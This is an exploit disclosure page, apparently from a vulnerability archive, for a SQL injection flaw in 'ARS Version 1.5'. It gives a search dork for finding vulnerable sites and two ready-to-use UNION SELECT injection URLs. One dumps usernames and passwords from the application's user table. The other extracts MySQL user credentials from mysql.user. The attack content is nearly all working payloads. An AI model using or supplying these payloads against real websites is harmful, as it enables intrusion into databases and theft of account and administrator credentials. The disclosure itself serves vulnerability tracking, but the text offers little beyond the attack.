ARS Version 1.5 SQL Injection Vulnerability

2008.06.11
Credit: Hussin X
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################################################### # # ARS Version 1.5 SQL Injection Vulnerability #======================================================== # Author: Hussin X = # = # Home : www.tryag.cc/cc = # = # email: darkangel_g85[at]Yahoo[DoT]com = # hussin.x[at]hotmail[DoT]com = # = #========================================================= # DorK : Powered By ARS Version 1.5 # ########################################################## Exploit: 1 http://victim.com/page/?id=-1+union+select+1,concat_ws(0x3a,username,password),null+from+ars_user-- Exploit: 2 > Root database http://victim.com/page/?id=-1+union+select+1,concat(user,0x3a,password),null+from+mysql.user-- ########################################################### ########################( Greetz )######################### # # # tryag / DeViL iRaQ / IRAQ DiveR/ mos_chori / FAHD # # # ####################(and All IRAQIs)####################### ###########################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top